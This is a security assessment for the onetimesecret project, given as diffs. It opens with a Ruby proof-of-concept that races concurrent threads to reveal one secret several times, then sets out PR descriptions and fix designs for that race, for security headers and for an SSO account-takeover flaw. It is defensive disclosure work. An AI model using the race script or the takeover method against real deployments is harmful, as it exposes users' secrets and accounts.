+ENV['IDENTIFIER_SECRET']        ||= 'a' * 64
+ENV['VERIFIABLE_ID_HMAC_SECRET']||= ENV['IDENTIFIER_SECRET']
+ENV['HOST']                     ||= 'localhost:3000'
+$LOAD_PATH.unshift('/home/user/onetimesecret/lib')
+require 'onetime'
+OT.execution_mode = :backend
+Onetime.boot! :app
+begin; require 'semantic_logger'; SemanticLogger.default_level = :fatal; rescue StandardError; end
+
+CONC = (ARGV[0] || 10).to_i
+
+def make_secret(plaintext)
+  s = Onetime::Secret.new
+  s.objid                      # ensure identifier exists before encryption (context binding)
+  s.state    = 'new'
+  s.owner_id = 'anon'
+  s.lifespan = 3600
+  s.ciphertext = plaintext     # encrypted_field setter encrypts under this record's context
+  s.save
+  s.identifier
+end
+
+id = make_secret("RACE-CANARY-#{Time.now.to_i}-#{rand(1_000_000)}")
+puts "[setup] created secret id=#{id[0,16]}…  exists=#{Onetime::Secret.load(id) ? true : false}"
+
+start = Queue.new
+got   = Queue.new
+destroys = Queue.new
+natural = ENV['NOBARRIER']
+threads = CONC.times.map do
+  Thread.new do
+    if natural
+      start.pop                            # natural: release, then load+check+consume
+      s = Onetime::Secret.load(id)
+      viewable = s && s.viewable?
+    else
+      s = Onetime::Secret.load(id)         # fresh load — exactly like process_params
+      viewable = s && s.viewable?          # raise_concerns gate (live HEXISTS)
+      start.pop                            # barrier: all threads loaded+checked, now race the consume
+    end
+    next unless viewable
+    val = s.decrypted_secret_value         # decrypt from in-memory ciphertext
+    s.revealed!                            # consume: state-check (in-memory) + destroy!
+    got << val if val && !val.empty?
+    destroys << 1
+  end
+end
+sleep 0.1
+CONC.times { start << :go }                # release simultaneously
+threads.each(&:join)
+
+n = got.size
+puts "[result] threads=#{CONC}  passed_viewable_gate+revealed_plaintext=#{n}  destroy!_calls=#{destroys.size}"
+puts "[result] secret still present after run? #{Onetime::Secret.load(id) ? 'yes' : 'no (consumed)'}"
+puts(n > 1 ?
+  "[VULNERABLE] One-time guarantee BROKEN: the same secret's plaintext was returned to #{n} concurrent callers." :
+  "[ok] plaintext returned to at most one caller.")

--- a/docs/security/assessment-2026-06-22/pull-requests/C1.md
+++ b/docs/security/assessment-2026-06-22/pull-requests/C1.md
@@ -1,0 +1,39 @@
+# PR: Make one-time reveal/burn atomic (single-winner consume) — C1
+
+- **Head:** `claude/fix-one-time-reveal-atomicity`
+- **Base:** `main` (or `develop`)
+- **Severity:** High · **Affects default config:** Yes · **Reviewed:** fresh agent, APPROVE after spec fix
+
+## Summary
+
+The one-time guarantee was a TOCTOU race. Reveal/burn checked the in-memory `state`, decrypted, then
+destroyed the secret as **separate** steps, so under true parallelism (clustered Puma worker processes —
+no shared GIL) two requests could each pass the guard, decrypt, and destroy, disclosing the **same**
+secret to multiple parties. Reproduced: **12/12** parallel processes obtained the plaintext.
+
+## Change
+
+- **Model** (`secret_state_management.rb`): new `claim_consumption!` runs a Lua script that atomically
+  checks `state` and `DEL`s the key in one server-side step, returning true to the single winner.
+  (Familia stores field values JSON-encoded, so the script strips the quotes around the stored `state`.)
+  `revealed!`/`burned!` now `return false unless claim_consumption!`, then update the receipt + `destroy!`
+  (the redundant main-key `DEL` is a harmless no-op) and return a boolean.
+- **Logic** (v1+v2 reveal/show/burn): every path that returns the plaintext is gated on winning the
+  claim — reveal/show raise `OT::MissingSecret` on a lost claim; burn counts only the winner. Decrypt
+  still precedes the claim but is harmless because losers raise before returning.
+
+## Result / evidence
+
+After the fix the multi-process race yields **exactly 1** disclosure (was 12/12). See
+`../evidence/c1_fix_verification.txt` and the PoC under `../poc/`. Existing reveal/burn/state specs pass
+(164 examples); v1 spec stubs updated for the new boolean return contract.
+
+## Test plan
+
+`../test-plans/C1.md` (23 cases). **CI note:** the concurrency tests are only meaningful under
+clustered Puma (`WEB_CONCURRENCY>=2`) + real Valkey — a single MRI process hides the race via the GIL.
+
+## Out of scope (follow-up)
+
+Verification-secret reveal branches remain non-atomic (account email-verification, not one-time content;
+idempotent side effects) — see the in-code note and `../resolutions/C1-one-time-reveal-atomicity.md`.

--- a/docs/security/assessment-2026-06-22/pull-requests/C1.md
+++ b/docs/security/assessment-2026-06-22/pull-requests/C1.md
@@ -25,7 +25,7 @@ secret to multiple parties. Reproduced: **12/12** parallel processes obtained th
 ## Result / evidence
 
 After the fix the multi-process race yields **exactly 1** disclosure (was 12/12). See
-`../evidence/c1_fix_verification.txt` and the PoC under `../poc/`. Existing reveal/burn/state specs pass
+`../evidence/c1_fix_verification.md` and the PoC under `../poc/`. Existing reveal/burn/state specs pass
 (164 examples); v1 spec stubs updated for the new boolean return contract.
 
 ## Test plan

--- a/docs/security/assessment-2026-06-22/pull-requests/PR1-resolve-omniauth-email.md
+++ b/docs/security/assessment-2026-06-22/pull-requests/PR1-resolve-omniauth-email.md
@@ -1,0 +1,36 @@
+# PR: SSO — resolve email with verified-mailbox fallback (#3499 Phase 1)
+
+- **Head:** `claude/fix-3499-resolve-omniauth-email`
+- **Base:** `main` (or `develop`)
+- **Stacking:** **base of the SSO stack.** Must merge before / together with PR-2
+  (`claude/fix-sso-secure-linking`). Do **not** ship alone with SSO enabled (it broadens email
+  resolution before PR-2 adds the account-linking guard).
+- **Affects default config:** No (SSO off by default).
+
+## Summary
+
+Implements **#3499 Phase 1**: a single `resolve_omniauth_email` helper that resolves the SSO email from
+**tier-1 verified mailbox claims only** — `info.email`, falling back to `extra.raw_info["mail"]` when the
+IdP omits the `email` claim (EntraID without a mailbox / email optional claim — #3478). Mutable tier-2
+identifiers (`upn`/`preferred_username`) are intentionally NOT used (Microsoft warns they're mutable;
+using them for linking is a takeover vector — see #3499). Returns nil when no verified email is
+available, falling through to the existing `invalid_email` handling.
+
+Wired into account lookup (`account_from_omniauth`), new-account creation (`omniauth_new_account`), and
+the `before_omniauth_create_account` validation (now reads the resolved value).
+
+## Files
+
+`apps/web/auth/config/hooks/omniauth.rb` (1 file).
+
+## Test plan
+
+`../test-plans/SSO-3499-A1-A4-A2.md` (resolution cases SSO-U-01..). Note: full SSO integration specs
+need an SSO-capable env (IdP + auth DB); resolution logic was unit-validated in isolation across the
+tier cases.
+
+## Review status
+
+Self-validated (resolution logic unit-checked; idiom matches `rodauth_overrides.rb`; accessors confirmed
+in the rodauth-omniauth `omniauth_base.rb`). A fresh review was dispatched; the SSO integration specs
+could not boot in the analysis env — confirm in an SSO-capable CI before merge.

--- a/docs/security/assessment-2026-06-22/pull-requests/PR2-sso-secure-linking.md
+++ b/docs/security/assessment-2026-06-22/pull-requests/PR2-sso-secure-linking.md
@@ -18,6 +18,15 @@ fail-safe). On a hit: clear `@account`, flash, and redirect to `/signin?auth_err
 ("sign in and connect this provider from settings"). Pure-SSO accounts (no password) still link by
 verified email.
 
+> **⚠️ Re-verification correction (2026-06-24) — this A1 section is incomplete as written.**
+> `account_has_independent_credentials? = !get_password_hash.nil?` is **false for a pure-SSO account**, so
+> "Pure-SSO accounts still link by verified email" leaves a **cross-provider takeover**: an attacker
+> controlling a *different* IdP that asserts a pure-SSO victim's verified email is silently adopted into the
+> victim's account. Refuse silent adoption of **any** account not already linked to the **exact
+> `(provider, uid)`** authenticating (returning users match earlier via `account_identities`); route every
+> other collision — password **and** different-provider pure-SSO — to the explicit link flow. See
+> `../resolutions/A1-sso-account-linking.md` (corrected layer 2) and add the pure-SSO takeover regression.
+
 ### A4 — domain allowlist on the linking path
 The SSO domain policy (previously only on account creation) is now also enforced on linking via
 `Onetime::SignupValidation.valid_signup_email?(email, display_domain:)`.

--- a/docs/security/assessment-2026-06-22/pull-requests/PR2-sso-secure-linking.md
+++ b/docs/security/assessment-2026-06-22/pull-requests/PR2-sso-secure-linking.md
@@ -1,0 +1,58 @@
+# PR: SSO secure account-linking + opt-in MFA (A1 / A4 / A2)
+
+- **Head:** `claude/fix-sso-secure-linking`
+- **Base:** `claude/fix-3499-resolve-omniauth-email` (**stacked on PR-1**)
+- **Affects default config:** No (SSO off by default). Default *behaviour* is unchanged for A2.
+
+## Summary
+
+Builds on PR-1's `resolve_omniauth_email` to close the SSO account-takeover vector and add an opt-in MFA
+policy.
+
+### A1 — no silent merge into a credentialed account (Critical)
+`account_from_omniauth` is the first-time-this-identity path (returning users match earlier by
+`(provider, uid)`). If the resolved email matches a **pre-existing account that has its own credential**
+(a password), we **refuse to silently adopt it** — otherwise an IdP asserting a victim's email would log
+straight into the victim's local account. New `account_has_independent_credentials?` (`!get_password_hash.nil?`,
+fail-safe). On a hit: clear `@account`, flash, and redirect to `/signin?auth_error=sso_link_required`
+("sign in and connect this provider from settings"). Pure-SSO accounts (no password) still link by
+verified email.
+
+### A4 — domain allowlist on the linking path
+The SSO domain policy (previously only on account creation) is now also enforced on linking via
+`Onetime::SignupValidation.valid_signup_email?(email, display_domain:)`.
+
+### A2 — opt-in local MFA after SSO (default OFF; research-aligned)
+Per the WorkOS/Clerk research, SSO-as-fully-authenticated is the industry default, so we **keep that
+default** (and the #3114 spec stays green). New **opt-in** `require_local_mfa_after_sso` on
+`DetectMfaRequirement` (default false). When enabled, SSO is treated as the first factor and an enrolled
+local second factor is still required. **Configurable at two levels** (domain wins over install):
+- **Install:** `SSO_REQUIRE_LOCAL_MFA` env (surfaced as `full.sso.require_local_mfa` in `auth.defaults.yaml`).
+- **Domain:** `CustomDomain::SsoConfig#require_local_mfa` (tri-state; nil = inherit install default).
+
+## Files
+
+`apps/web/auth/config/hooks/omniauth.rb`, `apps/web/auth/config/hooks/login.rb`,
+`apps/web/auth/operations/detect_mfa_requirement.rb`, `lib/onetime/models/custom_domain/sso_config.rb`,
+`etc/defaults/auth.defaults.yaml`.
+
+## ⚠️ Behaviour notes
+
+- A1 changes first-time SSO behaviour for **email collisions with password accounts**: instead of silent
+  login, the user is told to sign in and link from settings. This is the intended security boundary.
+- A2 default is unchanged; only operators who opt in (install or per-domain) get a local 2nd factor
+  after SSO.
+
+## Test plan
+
+`../test-plans/SSO-3499-A1-A4-A2.md` (30 cases): the A1 takeover regression, domain-on-linking, and the
+A2 default-vs-opt-in matrix. The pure-unit `detect_mfa_requirement_spec.rb` confirms the A2 default is
+preserved. **Full SSO integration tests require an SSO-capable env (IdP + auth DB) and must run in CI
+before merge.**
+
+## Review status
+
+Implemented with API/idiom verification (`get_password_hash`, `SignupValidation`, `auth_private_methods`
+`@account` semantics, `auth_class_eval`); fresh review dispatched (static + the runnable MFA unit spec).
+Given SSO can't be runtime-exercised here, treat as a reviewed **draft pending SSO-integration
+validation**.

--- a/docs/security/assessment-2026-06-22/pull-requests/README.md
+++ b/docs/security/assessment-2026-06-22/pull-requests/README.md
@@ -13,8 +13,8 @@ the branches are cut from commit `ef971b0`, the pre-assessment code state).
 |----|--------|------|--------|
 | C1 | `claude/fix-one-time-reveal-atomicity` | main | pushed, reviewed ✅ |
 | S1/S2 | `claude/fix-secure-header-defaults` | main | pushed, reviewed ✅ |
-| #3499 PR-1 | `claude/fix-3499-resolve-omniauth-email` | main | pending review |
-| SSO PR-2 | `claude/fix-sso-secure-linking` | `claude/fix-3499-resolve-omniauth-email` | pending |
+| #3499 PR-1 | `claude/fix-3499-resolve-omniauth-email` | main | pushed (review env-limited; needs SSO-CI) |
+| SSO PR-2 | `claude/fix-sso-secure-linking` | `claude/fix-3499-resolve-omniauth-email` | implemented, under review |
 
 C1 and S1/S2 are independent (either order). The SSO pair is **stacked**:
 PR-2 targets PR-1's branch and must merge after it. PR-1 must NOT ship alone

--- a/docs/security/assessment-2026-06-22/pull-requests/README.md
+++ b/docs/security/assessment-2026-06-22/pull-requests/README.md
@@ -1,0 +1,25 @@
+# Ready-to-open PR descriptions
+
+Per the chosen workflow (push stacked branches, **no PRs opened**), these are
+copy-paste-ready PR descriptions. All branches were committed only after a
+fresh-agent review.
+
+**Base branch:** `main` (or `develop` if that is your integration branch —
+the branches are cut from commit `ef971b0`, the pre-assessment code state).
+
+## Branch / stacking map
+
+| PR | Branch | Base | Status |
+|----|--------|------|--------|
+| C1 | `claude/fix-one-time-reveal-atomicity` | main | pushed, reviewed ✅ |
+| S1/S2 | `claude/fix-secure-header-defaults` | main | pushed, reviewed ✅ |
+| #3499 PR-1 | `claude/fix-3499-resolve-omniauth-email` | main | pending review |
+| SSO PR-2 | `claude/fix-sso-secure-linking` | `claude/fix-3499-resolve-omniauth-email` | pending |
+
+C1 and S1/S2 are independent (either order). The SSO pair is **stacked**:
+PR-2 targets PR-1's branch and must merge after it. PR-1 must NOT ship alone
+with SSO enabled (it broadens email resolution before PR-2 adds the
+account-linking guard).
+
+Individual descriptions: `C1.md`, `S1-S2.md`, `PR1-resolve-omniauth-email.md`,
+`PR2-sso-secure-linking.md`.

--- a/docs/security/assessment-2026-06-22/pull-requests/S1-S2.md
+++ b/docs/security/assessment-2026-06-22/pull-requests/S1-S2.md
@@ -1,0 +1,43 @@
+# PR: Secure-by-default security headers + staged CSP — S1/S2
+
+- **Head:** `claude/fix-secure-header-defaults`
+- **Base:** `main` (or `develop`)
+- **Severity:** High · **Affects default config:** Yes · **Reviewed:** fresh agent, APPROVE
+
+## Summary
+
+A default install shipped without CSP, `X-Frame-Options`, HSTS, Origin-CSRF, or `X-XSS-Protection`
+(confirmed live: `../evidence/headers_output.txt`). This flips those to secure defaults.
+
+## Change (`etc/defaults/config.defaults.yaml`, applied globally by the security middleware)
+
+- `frame_options`, `http_origin`, `xss_header` → **default true**. `HttpOrigin` only rejects
+  cross-origin state-changing requests with a mismatched Origin; server-to-server API-token clients
+  (no Origin header) are unaffected.
+- `strict_transport` (HSTS) → **default tracks `SSL`**: on under HTTPS, off in plain-HTTP dev (no sticky
+  HSTS on `http://`). Explicit `MIDDLEWARE_STRICT_TRANSPORT` always wins.
+- CSP → **enabled by default but staged in REPORT-ONLY** (`Content-Security-Policy-Report-Only`):
+  violations are observable, nothing is blocked. New `csp.report_only` (default true) + `csp.report_uri`;
+  `add_response_headers` emits report-only vs enforced accordingly (with a sanitized `report-uri`).
+  Set `CSP_REPORT_ONLY=false` to enforce.
+- Frontend Zod shape/contract + tests kept in sync.
+
+## ⚠️ Upgrade note (behaviour change)
+
+Operators currently running `CSP_ENABLED=true` expecting an **enforced** policy will now get
+**report-only** until they set `CSP_REPORT_ONLY=false`. Nothing is blocked for them in the interim — a
+deliberate, safe staging step. **Action for them:** set `CSP_REPORT_ONLY=false` to restore/enable
+enforcement.
+
+## Scope / follow-up
+
+CSP via `add_response_headers` covers **API v1** responses only. The web/core SPA emits CSP separately
+via otto `enable_csp_with_nonce!`; v2/v3 emit none. Unifying CSP emission across web-core/v1/v2/v3 (and
+confirming the nonce reaches every script before flipping to enforce) is a tracked follow-up. S2's
+headers are global via the security middleware.
+
+## Test plan
+
+`../test-plans/S1-S2.md` (21 cases): default-on header assertions, HSTS-only-under-HTTPS, report-only
+staging, operator override, and a Playwright smoke (load + conceal + reveal with zero CSP violations)
+to run before flipping to enforce.

--- a/docs/security/assessment-2026-06-22/pull-requests/S1-S2.md
+++ b/docs/security/assessment-2026-06-22/pull-requests/S1-S2.md
@@ -7,7 +7,7 @@
 ## Summary
 
 A default install shipped without CSP, `X-Frame-Options`, HSTS, Origin-CSRF, or `X-XSS-Protection`
-(confirmed live: `../evidence/headers_output.txt`). This flips those to secure defaults.
+(confirmed live: `../evidence/headers_output.md`). This flips those to secure defaults.
 
 ## Change (`etc/defaults/config.defaults.yaml`, applied globally by the security middleware)
 

--- a/docs/security/assessment-2026-06-22/resolutions/A1-sso-account-linking.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A1-sso-account-linking.md
@@ -1,0 +1,150 @@
+# A1 — SSO email-match account takeover (secure account linking)
+
+- **Severity:** Critical (gated on SSO/OmniAuth being enabled; not yet in production)
+- **Status:** Proposed fix — **design into issue #3499**, not a standalone patch
+- **Affects default config?** No (SSO is off by default)
+- **Related:** #3499 (Support SSO accounts when IdP omits the email claim), #3478, #3482; findings A2, A4
+- **Primary files:** `apps/web/auth/config/hooks/omniauth.rb`, `apps/web/auth/config/features/omniauth.rb`,
+  fork `rodauth-omniauth/lib/rodauth/features/omniauth.rb`
+
+## Problem (recap)
+
+On the OmniAuth callback, OTS resolves the account by email and links the SSO identity to **any
+pre-existing local account** with that email:
+
+```ruby
+# apps/web/auth/config/hooks/omniauth.rb:27-30
+auth.account_from_omniauth do
+  normalized_email = OT::Utils.normalize_email(omniauth_email)
+  _account_from_login(normalized_email)        # returns an existing password account
+end
+auth.omniauth_verify_account? true             # features/omniauth.rb:38-40 — trust the IdP
+```
+
+There is **no `email_verified` claim check** anywhere, and the linking is by email alone. An actor who
+can make a configured IdP (a tenant SSO connection they influence, a self-service OIDC provider, or any
+provider that does not prove mailbox ownership) assert `email = victim@corp.com` is silently linked to
+the victim's existing password account and logged in — full account takeover.
+
+## Root cause
+
+Two trust assumptions are baked in:
+
+1. **The email claim is trusted unconditionally** (`omniauth_verify_account? true`, no `email_verified`).
+   `rodauth-omniauth` itself states "provider login is required to return the user's email address" and
+   uses that email for both creation and lookup — it never asserts the email is *verified by the IdP*.
+2. **First-time SSO is allowed to auto-merge into an existing, differently-authenticated account.**
+   Returning users are safely keyed by `account_identities (provider, uid)`, but the *first* SSO login
+   for an email matching a pre-existing password account silently adopts that account.
+
+#3499 already names this exact vector ("writing an unverified … claim into this column could link an SSO
+identity to the wrong account — an account takeover vector") and defines **claim trust tiers**. A1 is the
+same root cause seen from the *linking* side: the trust-tier rule must gate **linking**, not only which
+claim populates `accounts.email`.
+
+## Prescribed resolution
+
+Fold A1 into #3499's `resolve_omniauth_email` work and add an explicit **secure-linking policy**. Three
+layers, defense-in-depth:
+
+### 1. Only a *verified* Tier-1 email may be used for lookup/linking
+
+Extend #3499's `resolve_omniauth_email` so it returns an email **only when it is verified**:
+
+```ruby
+# Single source of the linkable email. Encodes trust tier AND verification.
+def resolve_omniauth_email
+  info = omniauth_params_info            # omniauth.info / omniauth.extra.raw_info
+  return nil unless email_claim_verified?(info)   # see below
+  e = info['email'] || info.dig('raw_info', 'mail')   # Tier 1 only (per #3499)
+  e && OT::Utils.normalize_email(e)
+end
+
+# Verification policy, per provider. OIDC exposes email_verified; some providers
+# guarantee verification implicitly (document each in a trust policy table).
+def email_claim_verified?(info)
+  case omniauth_provider.to_s
+  when 'oidc', 'google_oauth2', 'entra_id'
+    v = info['email_verified']
+    v.nil? ? provider_guarantees_verified_email?(omniauth_provider) : !!v
+  when 'github'
+    # GitHub only returns verified primary emails via the API scope we request
+    true
+  else
+    false
+  end
+end
+```
+
+Tier-2 claims (`upn`, `preferred_username`) are **never** used for the email column or linking — exactly
+as #3499 specifies. This closes the "unverified claim → wrong account" path #3499 calls out.
+
+### 2. Do not auto-merge SSO into a pre-existing, differently-authenticated account
+
+This is the core A1 change and the most important for long-term safety. `account_from_omniauth` must
+return an existing account **only** when it is safe to adopt it:
+
+```ruby
+auth.account_from_omniauth do
+  email = resolve_omniauth_email
+  next nil unless email                       # no verified email -> new-account path (#3499 Phase 2)
+
+  account = _account_from_login(email)
+  next nil unless account
+
+  # Safe ONLY if this account is already linked to THIS (provider, uid),
+  # which rodauth-omniauth checks before calling this hook for returning users,
+  # OR the account has no password set (pure-SSO account, nothing to take over).
+  if account_has_other_authenticators?(account[account_id_column])
+    # An existing PASSWORD account. Refuse silent linking; route to explicit,
+    # authenticated linking instead of adopting the account.
+    set_redirect_error_flash login_required_error_flash
+    set_omniauth_error :requires_explicit_link   # -> "An account with this email exists.
+                                                 #    Sign in and link SSO from Account settings."
+    next nil
+  end
+  account
+end
+```
+
+`account_has_other_authenticators?` = "a password hash exists, or any non-SSO authenticator (TOTP,
+WebAuthn) is registered." For these accounts, linking must be an **explicit, authenticated, opt-in action
+from Account settings** (user is already logged in to the local account, then connects the IdP) — not a
+side effect of an unauthenticated callback. Returning pure-SSO users are unaffected (keyed by
+`(provider, uid)`).
+
+### 3. Enforce the SSO domain allowlist on the linking path too (closes A4)
+
+The domain policy currently runs only in `before_omniauth_create_account`. Move the check into
+`resolve_omniauth_email`/`account_from_omniauth` so **lookup/linking** also respects
+`allowed_signup_domains`. See `A4-sso-domain-allowlist.md`.
+
+## Alternatives considered
+
+- **Trust `info.email` but require `email_verified`** (layer 1 only): necessary but **insufficient** — a
+  malicious/compromised tenant IdP can set `email_verified: true`. Layer 2 (no silent merge into
+  password accounts) is what actually stops takeover, so both are required.
+- **Block any email collision entirely:** rejected — hurts the legitimate "I have a password account and
+  want to add SSO" case. The explicit authenticated-link flow serves that safely.
+
+## Test / verification
+
+Add to `apps/web/auth/spec/integration/full/`:
+1. **Takeover regression:** seed a password account `victim@corp.com`; simulate an OmniAuth callback
+   (`provider=oidc`, new `uid`) asserting `email=victim@corp.com` with `email_verified` absent/false →
+   assert **no login**, identity **not** linked, redirect to the explicit-link message.
+2. **Unverified-but-true tenant claim:** `email_verified: true` from an untrusted tenant + existing
+   password account → still no silent merge (layer 2).
+3. **Tier-2 only** (`preferred_username` matches an account, no verified email) → no link (keep the
+   `invalid_email` expectation noted in `omniauth_missing_email_spec.rb:291-319`).
+4. **Happy paths:** returning pure-SSO user by `(provider, uid)` logs in; first-time SSO with verified
+   email and *no* pre-existing account creates an account under domain policy.
+
+## Effort & risk
+
+- **Effort:** Medium — concentrated in `hooks/omniauth.rb` + the `resolve_omniauth_email` helper that
+  #3499 is already adding. No schema change for layer 1/2 (layer 3 reuses existing domain config).
+- **Sequencing:** land **before** SSO ships. Recommend a stacked PR on top of #3499: PR-1 = #3499 Phase 1
+  (`resolve_omniauth_email`, Tier-1/verified), PR-2 = A1 layer-2 secure-linking + A4 + A2 (MFA).
+- **Risk:** low regression for returning SSO users (identity-keyed path unchanged); the behavior change is
+  for first-time email collisions, which is the intended security boundary.

--- a/docs/security/assessment-2026-06-22/resolutions/A1-sso-account-linking.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A1-sso-account-linking.md
@@ -1,11 +1,41 @@
 # A1 — SSO email-match account takeover (secure account linking)
 
 - **Severity:** Critical (gated on SSO/OmniAuth being enabled; not yet in production)
-- **Status:** Proposed fix — **design into issue #3499**, not a standalone patch
+- **Status:** Proposed fix — **design into issue #3499**, not a standalone patch · **design gap flagged by
+  re-verification (2026-06-24) — see callout below; pure-SSO victim path not yet closed as written**
 - **Affects default config?** No (SSO is off by default)
 - **Related:** #3499 (Support SSO accounts when IdP omits the email claim), #3478, #3482; findings A2, A4
 - **Primary files:** `apps/web/auth/config/hooks/omniauth.rb`, `apps/web/auth/config/features/omniauth.rb`,
   fork `rodauth-omniauth/lib/rodauth/features/omniauth.rb`
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §4
+> "A1 pure-SSO gap", §9 matrix).** The three-layer design below is **sound but incomplete as written** — it
+> does not close cross-provider takeover of a **pure-SSO victim**. Severity stays **Critical**.
+>
+> Two gaps, both source-confirmed:
+> 1. **Prerequisite not yet in the tree.** `resolve_omniauth_email` (and `email_claim_verified?`) **do not
+>    exist** — `rg resolve_omniauth_email` over `lib/`+`apps/` returns **0 hits** (only docs). Layers 1 and 3
+>    presuppose #3499 Phase 1; A1 is genuinely *not* implementable standalone. Land **PR-1 (#3499 Phase 1)
+>    first**, then A1 on top (`PR2-sso-secure-linking.md`).
+> 2. **Layer-2 guard is too narrow.** It refuses silent linking only when
+>    `account_has_other_authenticators?(account)` is **true** (a password hash or a TOTP/WebAuthn factor
+>    exists). For a **pure-SSO account** — one with no password and no second factor, linked only to provider
+>    A via `(provider, uid)` — that predicate returns **false**, so the guard falls through and the existing
+>    account is silently adopted. An attacker who controls a *different* IdP (provider B: a self-service OIDC
+>    connection, or any provider that does not prove mailbox ownership) and asserts the victim's verified
+>    email therefore takes over the pure-SSO account on the unauthenticated callback. (Both
+>    `account_has_other_authenticators?` and `resolve_omniauth_email` are proposed-only: **0 hits** in source.)
+>
+> **Correction to layer 2.** Do not key the refusal on "has other authenticators." Refuse silent adoption of
+> **any** existing account that is **not already linked to the exact `(provider, uid)` currently
+> authenticating** — pure-SSO-with-a-different-provider included. The only safe silent path is the returning
+> user (same `provider`+`uid`), which `rodauth-omniauth` resolves via `account_identities` *before* this hook
+> runs; every other email collision (password account **or** different-provider SSO account) must route to the
+> explicit, authenticated, opt-in link flow from Account settings. Concretely, replace the
+> `account_has_other_authenticators?` branch with "an account exists for this email **and** it is not the
+> identity-keyed returning user → `set_omniauth_error :requires_explicit_link; next nil`." Add a takeover
+> regression for the pure-SSO victim (provider A account, provider-B callback asserting the same verified
+> email → no login, no link) alongside the existing password-account case in the test plan below.
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/A2-sso-mfa-bypass.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A2-sso-mfa-bypass.md
@@ -1,0 +1,70 @@
+# A2 — SSO bypasses MFA unconditionally
+
+- **Severity:** High (gated on SSO + MFA both enabled)
+- **Status:** Proposed fix
+- **Affects default config?** No (SSO off by default)
+- **Related:** A1, A4; #3499 (same SSO callback work). Finding 01.
+- **Primary files:** `apps/web/auth/config/hooks/login.rb:128-133`,
+  `apps/web/auth/operations/detect_mfa_requirement.rb:151-156`
+
+## Problem (recap)
+
+The MFA requirement is short-circuited whenever the login arrives via SSO:
+
+```ruby
+# detect_mfa_requirement.rb (≈151-156): via_omniauth: true returns "MFA not required"
+# before any per-account policy is consulted.
+```
+
+A user who has enrolled TOTP/WebAuthn can therefore authenticate with **only** the federated factor —
+SSO silently downgrades a 2-factor account to 1-factor. If A1 is also exploitable, MFA provides no
+backstop.
+
+## Root cause
+
+SSO is being treated as "authentication complete" rather than "first factor satisfied." The IdP's own
+assurance level (whether *it* performed MFA) is never inspected, and the local MFA enrollment is ignored
+for the `via_omniauth` path.
+
+## Prescribed resolution
+
+Treat federation as the **first factor**. After a successful SSO callback, consult the account's local
+MFA enrollment and the IdP's asserted authentication strength:
+
+1. **Default:** if the account has any active second factor (TOTP/WebAuthn/recovery), set the
+   `awaiting_mfa` partial-auth state after SSO and route through the existing MFA challenge — exactly as
+   password login does. Do **not** return early for `via_omniauth`.
+2. **IdP step-up credit (optional, explicit):** if the OIDC token asserts MFA was performed — `amr`
+   contains `mfa`/`otp`/`hwk`, or `acr` matches a configured high-assurance value — you *may* treat the
+   second factor as satisfied. Gate this behind explicit per-provider config
+   (`trust_idp_mfa: true` + allowed `acr` values); never infer it from the mere presence of SSO.
+3. Make the decision in `detect_mfa_requirement` so password and SSO share one code path: SSO changes
+   *which* first factor was used, not *whether* a second factor is required.
+
+```ruby
+# sketch
+def detect_mfa_requirement(account, via_omniauth:)
+  return mfa_satisfied if via_omniauth && idp_asserted_mfa?(omniauth_extra)   # opt-in only
+  require_mfa_if_enrolled(account)            # same logic for password and SSO
+end
+```
+
+## Alternatives considered
+
+- **Keep skipping MFA for SSO** (status quo): rejected — defeats the user's explicit second-factor choice
+  and pairs catastrophically with A1.
+- **Always force local MFA even when IdP did step-up:** acceptable and safest default; the `amr`/`acr`
+  credit is an optional convenience, off by default.
+
+## Test / verification
+
+- Account with TOTP enrolled logs in via SSO → lands in `awaiting_mfa`, second factor required.
+- With `trust_idp_mfa` on and token `amr=["mfa"]` → second factor satisfied; with `amr=["pwd"]` →
+  still challenged.
+- Account with no second factor → SSO logs in directly (unchanged).
+
+## Effort & risk
+
+- **Effort:** Small/Medium — localized to `detect_mfa_requirement` + the login hook. Reuses the existing
+  `awaiting_mfa` machinery (already correctly gated, per finding 01 positives).
+- **Risk:** Low. Land with A1/A4 as part of the SSO hardening PR before SSO ships.

--- a/docs/security/assessment-2026-06-22/resolutions/A2-sso-mfa-bypass.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A2-sso-mfa-bypass.md
@@ -1,12 +1,28 @@
 # A2 — SSO and local MFA (opt-in second factor after SSO)
 
 - **Severity:** Low–Medium — **revised after industry research** (was High). SSO-treated-as-fully-
-  authenticated is the *industry-default* posture, not a defect. Gated on SSO + MFA both enabled.
-- **Status:** Proposed fix — **additive/opt-in** (does NOT reverse the default)
+  authenticated is the *industry-default* posture, not a defect. Gated on SSO + MFA both enabled. — recalibrated to Low–Medium by 2026-06-24 re-verification (§7)
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below** (was additive/opt-in; does NOT reverse the default)
 - **Affects default config?** No (SSO off by default; and the default SSO behaviour is unchanged)
 - **Related:** A1, A4; **#3114** (intentionally introduced the SSO-skips-MFA behaviour); #3499. Finding 01.
 - **Primary files:** `apps/web/auth/config/hooks/login.rb:128-133`,
   `apps/web/auth/operations/detect_mfa_requirement.rb:151-156`
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5).**
+> Verdict: **scope-incomplete** — fix is `sound_with_caveats`, but one aggravating sub-claim is **FALSE**
+> and the prescribed sketch breaks the operation's pure-function contract. Severity holds at **Low–Medium**.
+> The "SSO silently overrides `mfa_policy == :required`" framing is **dead code**: `mfa_policy` is never
+> populated in production. The lone caller (`apps/web/auth/config/hooks/login.rb:128-133`) omits the
+> `mfa_policy:` kwarg, so it defaults to `nil` and the `@mfa_policy == :required` branch
+> (`detect_mfa_requirement.rb:159`) is never reached. The `:required`-override is not a live aggravator.
+>
+> **Correction:**
+> 1. Drop the `:required`-policy-override framing. The real, valid issue is the MFA bypass for
+>    **already-enrolled** accounts on the SSO path — keep that fix.
+> 2. Rework the fix to respect the operation's documented **pure-function contract**
+>    (`detect_mfa_requirement.rb:8-15`: no side effects, no I/O, immutable frozen result). Push any
+>    config lookup (`omniauth_require_local_mfa?`) and IdP-token reads (`idp_asserted_mfa?`) to the
+>    caller, passing the resolved primitives in — the operation must stay a pure decision over primitives.
 
 ## Problem (recap) + research correction
 

